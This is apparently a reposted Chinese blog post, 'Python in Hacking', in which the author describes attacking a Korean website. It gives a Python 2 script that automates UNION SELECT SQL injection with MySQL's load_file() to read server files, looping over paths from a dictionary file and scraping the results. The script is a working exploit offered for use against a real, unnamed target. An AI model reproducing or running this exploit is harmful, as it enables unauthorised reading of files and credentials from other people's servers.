Python in Hacking[LO
短信预约 -IT技能 免费直播动态提醒
Pnig0s p.s: ***一韩国站,遭遇Mysql4,好在有FILE权限只能批量LOAD_FILE路径,为了避免繁重的工作量写了这个脚本,字典文件名为dic.txt路径一行一个,因为环境不同,此脚本并非通用,稍作改动即可。复制代码请务必在普通IE下复制
- #!/usr/bin/python
- # -*- coding:utf-8 -*-
- ########################################
- # Coder:Pnig0s1992
- # A script to auto use the LOAD_FILE()
- # GTalk:pnigos70@gmail.com
- #Blog:http://pnig0s1992.blog.51cto.com/
- #
- ########################################
- import urllib
- import binascii
- import string
- import os
- def guessPath():
- fi = open('dic.txt','r+')
- while True:
- path = fi.readline().strip()
- if path:
- url = 'http://www.xxx.co.kr/?mode=view&no=\
- 1151 AnD 1=2 UnIon SeleCt 1,2,3,4,5,load_file(0x'+binascii.b2a_hex(str(path))+')'
- EnUrl=urllib.quote_plus(url,safe=':\'/?&=()|')
- fd = urllib.urlopen(EnUrl)
- res = fd.read()
- Begin = res.rfind('<table width="450" border="0" cellspacing="0" cellpadding="0">')
- End = res.rfind('<table width="486" border="0" cellspacing="0" cellpadding="0">')
- tempDate = res[Begin:End]
- realBegin = tempDate.index('<td>')+4
- realEnd = tempDate.index('</td>')
- checkEmpty = tempDate[realBegin:realEnd].strip()
- if checkEmpty:
- print path+' is exists!!!!!!!!!!!'
- print 'Geting the data......'
- print checkEmpty
- os.system('pause')
- else:
- print path+' is not exists.'
- continue
- else:
- print 'All has finished...'
- break
-
- if __name__ == '__main__':
- print '__________Written by Pnig0s1992__________'
- guessPath()
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
